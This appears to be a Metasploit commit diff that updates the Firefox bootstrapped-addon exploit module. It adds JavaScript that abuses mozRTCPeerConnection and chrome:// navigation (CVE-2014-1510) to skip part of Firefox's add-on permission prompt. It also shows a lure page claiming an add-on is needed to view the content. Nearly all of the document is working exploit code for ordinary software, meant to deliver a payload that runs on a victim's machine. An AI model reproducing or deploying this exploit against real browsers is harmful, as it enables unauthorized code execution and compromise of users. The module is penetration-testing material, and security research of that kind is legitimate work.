Land rapid7#3172 - CVE-2014-1510 to firefox_xpi_bootstrapped_addon

wchen-r7 · wchen-r7 · commit e3dda2e862c2 · 2014-04-02T14:07:37.000-05:00
diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -28,13 +28,18 @@ def initialize( info = {} )
         be "bootstrapped". As the addon will execute the payload after
         each Firefox restart, an option can be given to automatically
         uninstall the addon once the payload has been executed.
+
+        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
+        first half of the permissions prompt.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'mihi', 'joev' ],
       'References'    =>
         [
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
-          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
+          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
+          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
+          [ 'CVE', '2014-1511' ]
         ],
       'DisclosureDate' => 'Jun 27 2007'
     ))
@@ -67,10 +72,42 @@ def on_request_uri(cli, request)
   end
 
   def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
-    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
-    html << %Q|</body></html>|
-    return html
+    %Q|
+      <html><head><title>Loading, Please Wait...</title></head>
+        <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
+        <div style='visibility:hidden;width:1px;height:1px;'>
+          <iframe name='f'></iframe>
+        </div>
+        <script>
+          function install() {
+            window.location.href="addon.xpi";
+          }
+          #{web_idl_navigation}
+        </script>
+        </body>
+      </html>
+    |
+  end
+
+  # In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
+  # From there you can load the browser XUL, and inject a data URL into a nested frame.
+  # If the data URL opens the .xpi URL, the first permission prompt gets skipped.
+  def web_idl_navigation
+    %Q|
+      try {
+        c = new mozRTCPeerConnection;
+        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
+        setTimeout(function(){
+          try {
+            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
+                                  "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
+          } catch(e) {
+            install();
+          }
+        },600);
+      } catch(e) {
+        install();
+      }
+    |
   end
 end
